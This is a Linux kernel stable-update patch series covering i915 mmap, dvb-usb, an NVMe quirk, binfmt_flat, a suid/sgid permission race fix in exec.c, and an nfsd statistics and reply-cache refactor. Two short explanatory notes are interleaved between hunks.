++			obj = i915_gem_object_get_rcu(mmo->obj);
++
++			GEM_BUG_ON(obj && obj->ops->mmap_ops);
++		} else {
++			obj = i915_gem_object_get_rcu
++				(container_of(node, struct drm_i915_gem_object,
++					      base.vma_node));
++
++			GEM_BUG_ON(obj && !obj->ops->mmap_ops);
++		}
++	}
++	drm_vma_offset_unlock_lookup(dev->vma_offset_manager);
++	rcu_read_unlock();
++	if (!obj)
++		return node ? -EACCES : -EINVAL;
++
++	return i915_gem_object_mmap(obj, mmo, vma);
++}
++
++int i915_gem_fb_mmap(struct drm_i915_gem_object *obj, struct vm_area_struct *vma)
++{
++	struct drm_i915_private *i915 = to_i915(obj->base.dev);
++	struct drm_device *dev = &i915->drm;
++	struct i915_mmap_offset *mmo = NULL;
++	enum i915_mmap_type mmap_type;
++	struct i915_ggtt *ggtt = to_gt(i915)->ggtt;
++
++	if (drm_dev_is_unplugged(dev))
++		return -ENODEV;
++
++	/* handle ttm object */
++	if (obj->ops->mmap_ops) {
++		/*
++		 * The ttm fault handler, ttm_bo_vm_fault_reserved(), uses the fake
++		 * offset to calculate the page offset, so set that up.
++		 */
++		vma->vm_pgoff += drm_vma_node_start(&obj->base.vma_node);
++	} else {
++		/* handle stolen and smem objects */
++		mmap_type = i915_ggtt_has_aperture(ggtt) ? I915_MMAP_TYPE_GTT : I915_MMAP_TYPE_WC;
++		mmo = mmap_offset_attach(obj, mmap_type, NULL);
++		if (IS_ERR(mmo))
++			return PTR_ERR(mmo);
++
++		vma->vm_pgoff += drm_vma_node_start(&mmo->vma_node);
++	}
++
++	/*
++	 * When we install vm_ops for mmap, we are too late for
++	 * vm_ops->open(), which would have increased the ref_count of
++	 * this obj; it will still be decreased by vm_ops->close().
++	 * To balance this, increase the obj ref_count here.
++	 */
++	obj = i915_gem_object_get(obj);
++	return i915_gem_object_mmap(obj, mmo, vma);
++}
++
+ #if IS_ENABLED(CONFIG_DRM_I915_SELFTEST)
+ #include "selftests/i915_gem_mman.c"
+ #endif
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_mman.h b/drivers/gpu/drm/i915/gem/i915_gem_mman.h
+index 1fa91b3033b35a..196417fd0f5c41 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_mman.h
++++ b/drivers/gpu/drm/i915/gem/i915_gem_mman.h
+@@ -29,5 +29,5 @@ void i915_gem_object_release_mmap_gtt(struct drm_i915_gem_object *obj);
+ 
+ void i915_gem_object_runtime_pm_release_mmap_offset(struct drm_i915_gem_object *obj);
+ void i915_gem_object_release_mmap_offset(struct drm_i915_gem_object *obj);
+-
++int i915_gem_fb_mmap(struct drm_i915_gem_object *obj, struct vm_area_struct *vma);
+ #endif
+diff --git a/drivers/media/usb/dvb-usb/dvb-usb-init.c b/drivers/media/usb/dvb-usb/dvb-usb-init.c
+index 6cf6d08cc4ec91..58eea8ab547791 100644
+--- a/drivers/media/usb/dvb-usb/dvb-usb-init.c
++++ b/drivers/media/usb/dvb-usb/dvb-usb-init.c
+@@ -23,40 +23,11 @@ static int dvb_usb_force_pid_filter_usage;
+ module_param_named(force_pid_filter_usage, dvb_usb_force_pid_filter_usage, int, 0444);
+ MODULE_PARM_DESC(force_pid_filter_usage, "force all dvb-usb-devices to use a PID filter, if any (default: 0).");
+ 
+-static int dvb_usb_check_bulk_endpoint(struct dvb_usb_device *d, u8 endpoint)
+-{
+-	if (endpoint) {
+-		int ret;
+-
+-		ret = usb_pipe_type_check(d->udev, usb_sndbulkpipe(d->udev, endpoint));
+-		if (ret)
+-			return ret;
+-		ret = usb_pipe_type_check(d->udev, usb_rcvbulkpipe(d->udev, endpoint));
+-		if (ret)
+-			return ret;
+-	}
+-	return 0;
+-}
+-
+-static void dvb_usb_clear_halt(struct dvb_usb_device *d, u8 endpoint)
+-{
+-	if (endpoint) {
+-		usb_clear_halt(d->udev, usb_sndbulkpipe(d->udev, endpoint));
+-		usb_clear_halt(d->udev, usb_rcvbulkpipe(d->udev, endpoint));
+-	}
+-}
+-
+ static int dvb_usb_adapter_init(struct dvb_usb_device *d, short *adapter_nrs)
+ {
+ 	struct dvb_usb_adapter *adap;
+ 	int ret, n, o;
+ 
+-	ret = dvb_usb_check_bulk_endpoint(d, d->props.generic_bulk_ctrl_endpoint);
+-	if (ret)
+-		return ret;
+-	ret = dvb_usb_check_bulk_endpoint(d, d->props.generic_bulk_ctrl_endpoint_response);
+-	if (ret)
+-		return ret;
+ 	for (n = 0; n < d->props.num_adapters; n++) {
+ 		adap = &d->adapter[n];
+ 		adap->dev = d;
+@@ -132,8 +103,10 @@ static int dvb_usb_adapter_init(struct dvb_usb_device *d, short *adapter_nrs)
+ 	 * when reloading the driver w/o replugging the device
+ 	 * sometimes a timeout occurs, this helps
+ 	 */
+-	dvb_usb_clear_halt(d, d->props.generic_bulk_ctrl_endpoint);
+-	dvb_usb_clear_halt(d, d->props.generic_bulk_ctrl_endpoint_response);
++	if (d->props.generic_bulk_ctrl_endpoint != 0) {
++		usb_clear_halt(d->udev, usb_sndbulkpipe(d->udev, d->props.generic_bulk_ctrl_endpoint));
++		usb_clear_halt(d->udev, usb_rcvbulkpipe(d->udev, d->props.generic_bulk_ctrl_endpoint));
++	}
+ 
+ 	return 0;
+ 
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 6f648b58cbd4da..c309709ac9b55a 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3109,6 +3109,13 @@ static unsigned long check_vendor_combination_bug(struct pci_dev *pdev)
+ 			return NVME_QUIRK_FORCE_NO_SIMPLE_SUSPEND;
+ 	}
+ 
++	/*
++	 * NVMe SSD drops off the PCIe bus after system idle
++	 * for 10 hours on a Lenovo N60z board.
++	 */
++	if (dmi_match(DMI_BOARD_NAME, "LXKT-ZXEG-N6"))
++		return NVME_QUIRK_NO_APST;
++
+ 	return 0;
+ }
+ 
+diff --git a/fs/binfmt_flat.c b/fs/binfmt_flat.c
+index c26545d71d39a3..cd6d5bbb4b9df5 100644
+--- a/fs/binfmt_flat.c
++++ b/fs/binfmt_flat.c
+@@ -72,8 +72,10 @@
+ 
+ #ifdef CONFIG_BINFMT_FLAT_NO_DATA_START_OFFSET
+ #define DATA_START_OFFSET_WORDS		(0)
++#define MAX_SHARED_LIBS_UPDATE		(0)
+ #else
+ #define DATA_START_OFFSET_WORDS		(MAX_SHARED_LIBS)
++#define MAX_SHARED_LIBS_UPDATE		(MAX_SHARED_LIBS)
+ #endif
+ 
+ struct lib_info {
+@@ -880,7 +882,7 @@ static int load_flat_binary(struct linux_binprm *bprm)
+ 		return res;
+ 
+ 	/* Update data segment pointers for all libraries */
+-	for (i = 0; i < MAX_SHARED_LIBS; i++) {
++	for (i = 0; i < MAX_SHARED_LIBS_UPDATE; i++) {
+ 		if (!libinfo.lib_list[i].loaded)
+ 			continue;
+ 		for (j = 0; j < MAX_SHARED_LIBS; j++) {
+diff --git a/fs/exec.c b/fs/exec.c
+index b01434d6a512de..481b6e7df6ae50 100644
+--- a/fs/exec.c
++++ b/fs/exec.c
+@@ -1603,6 +1603,7 @@ static void bprm_fill_uid(struct linux_binprm *bprm, struct file *file)
+ 	unsigned int mode;
+ 	kuid_t uid;
+ 	kgid_t gid;
++	int err;
+ 
+ 	if (!mnt_may_suid(file->f_path.mnt))
+ 		return;
+@@ -1619,12 +1620,17 @@ static void bprm_fill_uid(struct linux_binprm *bprm, struct file *file)
+ 	/* Be careful if suid/sgid is set */
+ 	inode_lock(inode);
+ 
+-	/* reload atomically mode/uid/gid now that lock held */
++	/* Atomically reload and check mode/uid/gid now that lock held. */
+ 	mode = inode->i_mode;
+ 	uid = i_uid_into_mnt(mnt_userns, inode);
+ 	gid = i_gid_into_mnt(mnt_userns, inode);
++	err = inode_permission(mnt_userns, inode, MAY_EXEC);
+ 	inode_unlock(inode);
+ 
++	/* Did the exec bit vanish out from under us? Give up. */
++	if (err)
++		return;
++
+ 	/* We ignore suid/sgid if there are no mappings for them in the ns */
+ 	if (!kuid_has_mapping(bprm->cred->user_ns, uid) ||
+ 		 !kgid_has_mapping(bprm->cred->user_ns, gid))
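
Why the permission test moved under the lock: the exec bits were already checked
once when the file was opened for exec, without inode_lock() held, so they can
change before the privilege computation here. Re-reading mode/uid/gid and
re-running inode_permission() inside the same critical section makes the
suid/sgid decision one consistent snapshot. Schematically, condensed from the
hunk above:

	inode_lock(inode);
	mode = inode->i_mode;
	uid  = i_uid_into_mnt(mnt_userns, inode);
	gid  = i_gid_into_mnt(mnt_userns, inode);
	err  = inode_permission(mnt_userns, inode, MAY_EXEC);
	inode_unlock(inode);

	if (err)	/* exec permission vanished: grant nothing */
		return;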
+diff --git a/fs/lockd/svc.c b/fs/lockd/svc.c
+index 5579e67da17dbf..c33f78513f00f5 100644
+--- a/fs/lockd/svc.c
++++ b/fs/lockd/svc.c
+@@ -759,8 +759,6 @@ static const struct svc_version *nlmsvc_version[] = {
+ #endif
+ };
+ 
+-static struct svc_stat		nlmsvc_stats;
+-
+ #define NLM_NRVERS	ARRAY_SIZE(nlmsvc_version)
+ static struct svc_program	nlmsvc_program = {
+ 	.pg_prog		= NLM_PROGRAM,		/* program number */
+@@ -768,7 +766,6 @@ static struct svc_program	nlmsvc_program = {
+ 	.pg_vers		= nlmsvc_version,	/* version table */
+ 	.pg_name		= "lockd",		/* service name */
+ 	.pg_class		= "nfsd",		/* share authentication with nfsd */
+-	.pg_stats		= &nlmsvc_stats,	/* stats table */
+ 	.pg_authenticate	= &lockd_authenticate,	/* export authentication */
+ 	.pg_init_request	= svc_generic_init_request,
+ 	.pg_rpcbind_set		= svc_generic_rpcbind_set,
+diff --git a/fs/nfs/callback.c b/fs/nfs/callback.c
+index 46a0a2d6962e1c..e6445b556ce1c4 100644
+--- a/fs/nfs/callback.c
++++ b/fs/nfs/callback.c
+@@ -407,15 +407,12 @@ static const struct svc_version *nfs4_callback_version[] = {
+ 	[4] = &nfs4_callback_version4,
+ };
+ 
+-static struct svc_stat nfs4_callback_stats;
+-
+ static struct svc_program nfs4_callback_program = {
+ 	.pg_prog = NFS4_CALLBACK,			/* RPC service number */
+ 	.pg_nvers = ARRAY_SIZE(nfs4_callback_version),	/* Number of entries */
+ 	.pg_vers = nfs4_callback_version,		/* version table */
+ 	.pg_name = "NFSv4 callback",			/* service name */
+ 	.pg_class = "nfs",				/* authentication class */
+-	.pg_stats = &nfs4_callback_stats,
+ 	.pg_authenticate = nfs_callback_authenticate,
+ 	.pg_init_request = svc_generic_init_request,
+ 	.pg_rpcbind_set	= svc_generic_rpcbind_set,
+diff --git a/fs/nfsd/export.c b/fs/nfsd/export.c
+index 668c7527b17e81..16fadade86ccbc 100644
+--- a/fs/nfsd/export.c
++++ b/fs/nfsd/export.c
+@@ -339,12 +339,16 @@ static int export_stats_init(struct export_stats *stats)
+ 
+ static void export_stats_reset(struct export_stats *stats)
+ {
+-	nfsd_percpu_counters_reset(stats->counter, EXP_STATS_COUNTERS_NUM);
++	if (stats)
++		nfsd_percpu_counters_reset(stats->counter,
++					   EXP_STATS_COUNTERS_NUM);
+ }
+ 
+ static void export_stats_destroy(struct export_stats *stats)
+ {
+-	nfsd_percpu_counters_destroy(stats->counter, EXP_STATS_COUNTERS_NUM);
++	if (stats)
++		nfsd_percpu_counters_destroy(stats->counter,
++					     EXP_STATS_COUNTERS_NUM);
+ }
+ 
+ static void svc_export_put(struct kref *ref)
+@@ -353,7 +357,8 @@ static void svc_export_put(struct kref *ref)
+ 	path_put(&exp->ex_path);
+ 	auth_domain_put(exp->ex_client);
+ 	nfsd4_fslocs_free(&exp->ex_fslocs);
+-	export_stats_destroy(&exp->ex_stats);
++	export_stats_destroy(exp->ex_stats);
++	kfree(exp->ex_stats);
+ 	kfree(exp->ex_uuid);
+ 	kfree_rcu(exp, ex_rcu);
+ }
+@@ -744,13 +749,15 @@ static int svc_export_show(struct seq_file *m,
+ 	seq_putc(m, '\t');
+ 	seq_escape(m, exp->ex_client->name, " \t\n\\");
+ 	if (export_stats) {
+-		seq_printf(m, "\t%lld\n", exp->ex_stats.start_time);
++		struct percpu_counter *counter = exp->ex_stats->counter;
++
++		seq_printf(m, "\t%lld\n", exp->ex_stats->start_time);
+ 		seq_printf(m, "\tfh_stale: %lld\n",
+-			   percpu_counter_sum_positive(&exp->ex_stats.counter[EXP_STATS_FH_STALE]));
++			   percpu_counter_sum_positive(&counter[EXP_STATS_FH_STALE]));
+ 		seq_printf(m, "\tio_read: %lld\n",
+-			   percpu_counter_sum_positive(&exp->ex_stats.counter[EXP_STATS_IO_READ]));
++			   percpu_counter_sum_positive(&counter[EXP_STATS_IO_READ]));
+ 		seq_printf(m, "\tio_write: %lld\n",
+-			   percpu_counter_sum_positive(&exp->ex_stats.counter[EXP_STATS_IO_WRITE]));
++			   percpu_counter_sum_positive(&counter[EXP_STATS_IO_WRITE]));
+ 		seq_putc(m, '\n');
+ 		return 0;
+ 	}
+@@ -796,7 +803,7 @@ static void svc_export_init(struct cache_head *cnew, struct cache_head *citem)
+ 	new->ex_layout_types = 0;
+ 	new->ex_uuid = NULL;
+ 	new->cd = item->cd;
+-	export_stats_reset(&new->ex_stats);
++	export_stats_reset(new->ex_stats);
+ }
+ 
+ static void export_update(struct cache_head *cnew, struct cache_head *citem)
+@@ -832,7 +839,14 @@ static struct cache_head *svc_export_alloc(void)
+ 	if (!i)
+ 		return NULL;
+ 
+-	if (export_stats_init(&i->ex_stats)) {
++	i->ex_stats = kmalloc(sizeof(*(i->ex_stats)), GFP_KERNEL);
++	if (!i->ex_stats) {
++		kfree(i);
++		return NULL;
++	}
++
++	if (export_stats_init(i->ex_stats)) {
++		kfree(i->ex_stats);
+ 		kfree(i);
+ 		return NULL;
+ 	}
+diff --git a/fs/nfsd/export.h b/fs/nfsd/export.h
+index d03f7f6a8642d3..f73e23bb24a1ea 100644
+--- a/fs/nfsd/export.h
++++ b/fs/nfsd/export.h
+@@ -64,10 +64,10 @@ struct svc_export {
+ 	struct cache_head	h;
+ 	struct auth_domain *	ex_client;
+ 	int			ex_flags;
++	int			ex_fsid;
+ 	struct path		ex_path;
+ 	kuid_t			ex_anon_uid;
+ 	kgid_t			ex_anon_gid;
+-	int			ex_fsid;
+ 	unsigned char *		ex_uuid; /* 16 byte fsid */
+ 	struct nfsd4_fs_locations ex_fslocs;
+ 	uint32_t		ex_nflavors;
+@@ -76,7 +76,7 @@ struct svc_export {
+ 	struct nfsd4_deviceid_map *ex_devid_map;
+ 	struct cache_detail	*cd;
+ 	struct rcu_head		ex_rcu;
+-	struct export_stats	ex_stats;
++	struct export_stats	*ex_stats;
+ };
+ 
+ /* an "export key" (expkey) maps a filehandlefragement to an
+diff --git a/fs/nfsd/netns.h b/fs/nfsd/netns.h
+index 51a4b7885cae2a..548422b24a7d78 100644
+--- a/fs/nfsd/netns.h
++++ b/fs/nfsd/netns.h
+@@ -10,8 +10,10 @@
+ 
+ #include <net/net_namespace.h>
+ #include <net/netns/generic.h>
++#include <linux/nfs4.h>
+ #include <linux/percpu_counter.h>
+ #include <linux/siphash.h>
++#include <linux/sunrpc/stats.h>
+ 
+ /* Hash tables for nfs4_clientid state */
+ #define CLIENT_HASH_BITS                 4
+@@ -25,10 +27,22 @@ struct nfsd4_client_tracking_ops;
+ 
+ enum {
+ 	/* cache misses due only to checksum comparison failures */
+-	NFSD_NET_PAYLOAD_MISSES,
++	NFSD_STATS_PAYLOAD_MISSES,
+ 	/* amount of memory (in bytes) currently consumed by the DRC */
+-	NFSD_NET_DRC_MEM_USAGE,
+-	NFSD_NET_COUNTERS_NUM
++	NFSD_STATS_DRC_MEM_USAGE,
++	NFSD_STATS_RC_HITS,		/* repcache hits */
++	NFSD_STATS_RC_MISSES,		/* repcache misses */
++	NFSD_STATS_RC_NOCACHE,		/* uncached reqs */
++	NFSD_STATS_FH_STALE,		/* FH stale error */
++	NFSD_STATS_IO_READ,		/* bytes returned to read requests */
++	NFSD_STATS_IO_WRITE,		/* bytes passed in write requests */
++#ifdef CONFIG_NFSD_V4
++	NFSD_STATS_FIRST_NFS4_OP,	/* count of individual nfsv4 operations */
++	NFSD_STATS_LAST_NFS4_OP = NFSD_STATS_FIRST_NFS4_OP + LAST_NFS4_OP,
++#define NFSD_STATS_NFS4_OP(op)	(NFSD_STATS_FIRST_NFS4_OP + (op))
++	NFSD_STATS_WDELEG_GETATTR,	/* count of getattr conflict with wdeleg */
++#endif
++	NFSD_STATS_COUNTERS_NUM
+ };
+ 
+ /*
+@@ -168,7 +182,10 @@ struct nfsd_net {
+ 	atomic_t                 num_drc_entries;
+ 
+ 	/* Per-netns stats counters */
+-	struct percpu_counter    counter[NFSD_NET_COUNTERS_NUM];
++	struct percpu_counter    counter[NFSD_STATS_COUNTERS_NUM];
++
++	/* sunrpc svc stats */
++	struct svc_stat          nfsd_svcstats;
+ 
+ 	/* longest hash chain seen */
+ 	unsigned int             longest_chain;
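
The per-netns counters added here ride on the generic percpu_counter API. A
minimal lifecycle sketch (the primitives are the real kernel ones; the GFP flag
and initial value are just the common choices, not something this patch mandates):

	struct percpu_counter c;
	s64 v;

	if (percpu_counter_init(&c, 0, GFP_KERNEL))
		return -ENOMEM;		/* allocates per-CPU storage, can fail */
	percpu_counter_inc(&c);		/* hot path: per-CPU delta, no shared lock */
	v = percpu_counter_sum_positive(&c);	/* exact sum, clamped at >= 0 */
	percpu_counter_destroy(&c);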
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index b6d768bd5ccca4..7451cd34710d08 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -2430,10 +2430,10 @@ nfsd4_proc_null(struct svc_rqst *rqstp)
+ 	return rpc_success;
+ }
+ 
+-static inline void nfsd4_increment_op_stats(u32 opnum)
++static inline void nfsd4_increment_op_stats(struct nfsd_net *nn, u32 opnum)
+ {
+ 	if (opnum >= FIRST_NFS4_OP && opnum <= LAST_NFS4_OP)
+-		percpu_counter_inc(&nfsdstats.counter[NFSD_STATS_NFS4_OP(opnum)]);
++		percpu_counter_inc(&nn->counter[NFSD_STATS_NFS4_OP(opnum)]);
+ }
+ 
+ static const struct nfsd4_operation nfsd4_ops[];
+@@ -2708,7 +2708,7 @@ nfsd4_proc_compound(struct svc_rqst *rqstp)
+ 					   status, nfsd4_op_name(op->opnum));
+ 
+ 		nfsd4_cstate_clear_replay(cstate);
+-		nfsd4_increment_op_stats(op->opnum);
++		nfsd4_increment_op_stats(nn, op->opnum);
+ 	}
+ 
+ 	fh_put(current_fh);
+diff --git a/fs/nfsd/nfscache.c b/fs/nfsd/nfscache.c
+index f53335ae0ab228..50ed64a5155142 100644
+--- a/fs/nfsd/nfscache.c
++++ b/fs/nfsd/nfscache.c
+@@ -85,8 +85,8 @@ nfsd_hashsize(unsigned int limit)
+ }
+ 
+ static struct svc_cacherep *
+-nfsd_reply_cache_alloc(struct svc_rqst *rqstp, __wsum csum,
+-			struct nfsd_net *nn)
++nfsd_cacherep_alloc(struct svc_rqst *rqstp, __wsum csum,
++		    struct nfsd_net *nn)
+ {
+ 	struct svc_cacherep	*rp;
+ 
+@@ -110,21 +110,48 @@ nfsd_reply_cache_alloc(struct svc_rqst *rqstp, __wsum csum,
+ 	return rp;
+ }
+ 
+-static void
+-nfsd_reply_cache_free_locked(struct nfsd_drc_bucket *b, struct svc_cacherep *rp,
+-				struct nfsd_net *nn)
++static void nfsd_cacherep_free(struct svc_cacherep *rp)
+ {
+-	if (rp->c_type == RC_REPLBUFF && rp->c_replvec.iov_base) {
+-		nfsd_stats_drc_mem_usage_sub(nn, rp->c_replvec.iov_len);
++	if (rp->c_type == RC_REPLBUFF)
+ 		kfree(rp->c_replvec.iov_base);
++	kmem_cache_free(drc_slab, rp);
++}
++
++static unsigned long
++nfsd_cacherep_dispose(struct list_head *dispose)
++{
++	struct svc_cacherep *rp;
++	unsigned long freed = 0;
++
++	while (!list_empty(dispose)) {
++		rp = list_first_entry(dispose, struct svc_cacherep, c_lru);
++		list_del(&rp->c_lru);
++		nfsd_cacherep_free(rp);
++		freed++;
+ 	}
++	return freed;
++}
++
++static void
++nfsd_cacherep_unlink_locked(struct nfsd_net *nn, struct nfsd_drc_bucket *b,
++			    struct svc_cacherep *rp)
++{
++	if (rp->c_type == RC_REPLBUFF && rp->c_replvec.iov_base)
++		nfsd_stats_drc_mem_usage_sub(nn, rp->c_replvec.iov_len);
+ 	if (rp->c_state != RC_UNUSED) {
+ 		rb_erase(&rp->c_node, &b->rb_head);
+ 		list_del(&rp->c_lru);
+ 		atomic_dec(&nn->num_drc_entries);
+ 		nfsd_stats_drc_mem_usage_sub(nn, sizeof(*rp));
+ 	}
+-	kmem_cache_free(drc_slab, rp);
++}
++
++static void
++nfsd_reply_cache_free_locked(struct nfsd_drc_bucket *b, struct svc_cacherep *rp,
++				struct nfsd_net *nn)
++{
++	nfsd_cacherep_unlink_locked(nn, b, rp);
++	nfsd_cacherep_free(rp);
+ }
+ 
+ static void
+@@ -132,8 +159,9 @@ nfsd_reply_cache_free(struct nfsd_drc_bucket *b, struct svc_cacherep *rp,
+ 			struct nfsd_net *nn)
+ {
+ 	spin_lock(&b->cache_lock);
+-	nfsd_reply_cache_free_locked(b, rp, nn);
++	nfsd_cacherep_unlink_locked(nn, b, rp);
+ 	spin_unlock(&b->cache_lock);
++	nfsd_cacherep_free(rp);
+ }
+ 
+ int nfsd_drc_slab_create(void)
+@@ -148,16 +176,6 @@ void nfsd_drc_slab_free(void)
+ 	kmem_cache_destroy(drc_slab);
+ }
+ 
+-static int nfsd_reply_cache_stats_init(struct nfsd_net *nn)
+-{
+-	return nfsd_percpu_counters_init(nn->counter, NFSD_NET_COUNTERS_NUM);
+-}
+-
+-static void nfsd_reply_cache_stats_destroy(struct nfsd_net *nn)
+-{
+-	nfsd_percpu_counters_destroy(nn->counter, NFSD_NET_COUNTERS_NUM);
+-}
+-
+ int nfsd_reply_cache_init(struct nfsd_net *nn)
+ {
+ 	unsigned int hashsize;
+@@ -169,17 +187,13 @@ int nfsd_reply_cache_init(struct nfsd_net *nn)
+ 	hashsize = nfsd_hashsize(nn->max_drc_entries);
+ 	nn->maskbits = ilog2(hashsize);
+ 
+-	status = nfsd_reply_cache_stats_init(nn);
+-	if (status)
+-		goto out_nomem;
+-
+ 	nn->nfsd_reply_cache_shrinker.scan_objects = nfsd_reply_cache_scan;
+ 	nn->nfsd_reply_cache_shrinker.count_objects = nfsd_reply_cache_count;
+ 	nn->nfsd_reply_cache_shrinker.seeks = 1;
+ 	status = register_shrinker(&nn->nfsd_reply_cache_shrinker,
+ 				   "nfsd-reply:%s", nn->nfsd_name);
+ 	if (status)
+-		goto out_stats_destroy;
++		return status;
+ 
+ 	nn->drc_hashtbl = kvzalloc(array_size(hashsize,
+ 				sizeof(*nn->drc_hashtbl)), GFP_KERNEL);
+@@ -195,9 +209,6 @@ int nfsd_reply_cache_init(struct nfsd_net *nn)
+ 	return 0;
+ out_shrinker:
+ 	unregister_shrinker(&nn->nfsd_reply_cache_shrinker);
+-out_stats_destroy:
+-	nfsd_reply_cache_stats_destroy(nn);
+-out_nomem:
+ 	printk(KERN_ERR "nfsd: failed to allocate reply cache\n");
+ 	return -ENOMEM;
+ }
+@@ -217,7 +228,6 @@ void nfsd_reply_cache_shutdown(struct nfsd_net *nn)
+ 									rp, nn);
+ 		}
+ 	}
+-	nfsd_reply_cache_stats_destroy(nn);
+ 
+ 	kvfree(nn->drc_hashtbl);
+ 	nn->drc_hashtbl = NULL;
+@@ -244,12 +254,21 @@ nfsd_cache_bucket_find(__be32 xid, struct nfsd_net *nn)
+ 	return &nn->drc_hashtbl[hash];
+ }
+ 
+-static long prune_bucket(struct nfsd_drc_bucket *b, struct nfsd_net *nn,
+-			 unsigned int max)
++/*
++ * Remove and return no more than @max expired entries in bucket @b.
++ * If @max is zero, do not limit the number of removed entries.
++ */
++static void
++nfsd_prune_bucket_locked(struct nfsd_net *nn, struct nfsd_drc_bucket *b,
++			 unsigned int max, struct list_head *dispose)
+ {
++	unsigned long expiry = jiffies - RC_EXPIRE;
+ 	struct svc_cacherep *rp, *tmp;
+-	long freed = 0;
++	unsigned int freed = 0;
++
++	lockdep_assert_held(&b->cache_lock);
+ 
++	/* The bucket LRU is ordered oldest-first. */
+ 	list_for_each_entry_safe(rp, tmp, &b->lru_head, c_lru) {
+ 		/*
+ 		 * Don't free entries attached to calls that are still
+@@ -257,43 +276,29 @@ static long prune_bucket(struct nfsd_drc_bucket *b, struct nfsd_net *nn,
+ 		 */
+ 		if (rp->c_state == RC_INPROG)
+ 			continue;
++
+ 		if (atomic_read(&nn->num_drc_entries) <= nn->max_drc_entries &&
+-		    time_before(jiffies, rp->c_timestamp + RC_EXPIRE))
++		    time_before(expiry, rp->c_timestamp))
+ 			break;
+-		nfsd_reply_cache_free_locked(b, rp, nn);
+-		if (max && freed++ > max)
+-			break;
+-	}
+-	return freed;
+-}
+-
+-static long nfsd_prune_bucket(struct nfsd_drc_bucket *b, struct nfsd_net *nn)
+-{
+-	return prune_bucket(b, nn, 3);
+-}
+-
+-/*
+- * Walk the LRU list and prune off entries that are older than RC_EXPIRE.
+- * Also prune the oldest ones when the total exceeds the max number of entries.
+- */
+-static long
+-prune_cache_entries(struct nfsd_net *nn)
+-{
+-	unsigned int i;
+-	long freed = 0;
+ 
+-	for (i = 0; i < nn->drc_hashsize; i++) {
+-		struct nfsd_drc_bucket *b = &nn->drc_hashtbl[i];
++		nfsd_cacherep_unlink_locked(nn, b, rp);
++		list_add(&rp->c_lru, dispose);
+ 
+-		if (list_empty(&b->lru_head))
+-			continue;
+-		spin_lock(&b->cache_lock);
+-		freed += prune_bucket(b, nn, 0);
+-		spin_unlock(&b->cache_lock);
++		if (max && ++freed > max)
++			break;
+ 	}
+-	return freed;
+ }
+ 
++/**
++ * nfsd_reply_cache_count - count_objects method for the DRC shrinker
++ * @shrink: our registered shrinker context
++ * @sc: garbage collection parameters
++ *
++ * Returns the total number of entries in the duplicate reply cache. To
++ * keep things simple and quick, this is not the number of expired entries
++ * in the cache (i.e., the number that would be removed by a call to
++ * nfsd_reply_cache_scan).
++ */
+ static unsigned long
+ nfsd_reply_cache_count(struct shrinker *shrink, struct shrink_control *sc)
+ {
+@@ -303,13 +308,43 @@ nfsd_reply_cache_count(struct shrinker *shrink, struct shrink_control *sc)
+ 	return atomic_read(&nn->num_drc_entries);
+ }
+ 
++/**
++ * nfsd_reply_cache_scan - scan_objects method for the DRC shrinker
++ * @shrink: our registered shrinker context
++ * @sc: garbage collection parameters
++ *
++ * Free expired entries on each bucket's LRU list until we've released
++ * nr_to_scan freed objects. Nothing will be released if the cache
++ * has not exceeded its max_drc_entries limit.
++ *
++ * Returns the number of entries released by this call.
++ */
+ static unsigned long
+ nfsd_reply_cache_scan(struct shrinker *shrink, struct shrink_control *sc)
+ {
+ 	struct nfsd_net *nn = container_of(shrink,
+ 				struct nfsd_net, nfsd_reply_cache_shrinker);
++	unsigned long freed = 0;
++	LIST_HEAD(dispose);
++	unsigned int i;
++
++	for (i = 0; i < nn->drc_hashsize; i++) {
++		struct nfsd_drc_bucket *b = &nn->drc_hashtbl[i];
+ 
+-	return prune_cache_entries(nn);
++		if (list_empty(&b->lru_head))
++			continue;
++
++		spin_lock(&b->cache_lock);
++		nfsd_prune_bucket_locked(nn, b, 0, &dispose);
++		spin_unlock(&b->cache_lock);
++
++		freed += nfsd_cacherep_dispose(&dispose);
++		if (freed > sc->nr_to_scan)
++			break;
++	}
++
++	trace_nfsd_drc_gc(nn, freed);
++	return freed;
+ }
+ 
+ /**
+@@ -445,16 +480,18 @@ nfsd_cache_insert(struct nfsd_drc_bucket *b, struct svc_cacherep *key,
+ int nfsd_cache_lookup(struct svc_rqst *rqstp, unsigned int start,
+ 		      unsigned int len)
+ {
+-	struct nfsd_net		*nn;
++	struct nfsd_net		*nn = net_generic(SVC_NET(rqstp), nfsd_net_id);
+ 	struct svc_cacherep	*rp, *found;
+ 	__wsum			csum;
+ 	struct nfsd_drc_bucket	*b;
+ 	int type = rqstp->rq_cachetype;
++	unsigned long freed;
++	LIST_HEAD(dispose);
+ 	int rtn = RC_DOIT;
+ 
+ 	rqstp->rq_cacherep = NULL;
+ 	if (type == RC_NOCACHE) {
+-		nfsd_stats_rc_nocache_inc();
++		nfsd_stats_rc_nocache_inc(nn);
+ 		goto out;
+ 	}
+ 
+@@ -464,8 +501,7 @@ int nfsd_cache_lookup(struct svc_rqst *rqstp, unsigned int start,
+ 	 * Since the common case is a cache miss followed by an insert,
+ 	 * preallocate an entry.
+ 	 */
+-	nn = net_generic(SVC_NET(rqstp), nfsd_net_id);
+-	rp = nfsd_reply_cache_alloc(rqstp, csum, nn);
++	rp = nfsd_cacherep_alloc(rqstp, csum, nn);
+ 	if (!rp)
+ 		goto out;
+ 
+@@ -474,25 +510,23 @@ int nfsd_cache_lookup(struct svc_rqst *rqstp, unsigned int start,
+ 	found = nfsd_cache_insert(b, rp, nn);
+ 	if (found != rp)
+ 		goto found_entry;
+-
+-	nfsd_stats_rc_misses_inc();
+ 	rqstp->rq_cacherep = rp;
+ 	rp->c_state = RC_INPROG;
++	nfsd_prune_bucket_locked(nn, b, 3, &dispose);
++	spin_unlock(&b->cache_lock);
+ 
++	freed = nfsd_cacherep_dispose(&dispose);
++	trace_nfsd_drc_gc(nn, freed);
++
++	nfsd_stats_rc_misses_inc(nn);
+ 	atomic_inc(&nn->num_drc_entries);
+ 	nfsd_stats_drc_mem_usage_add(nn, sizeof(*rp));
+-
+-	nfsd_prune_bucket(b, nn);
+-
+-out_unlock:
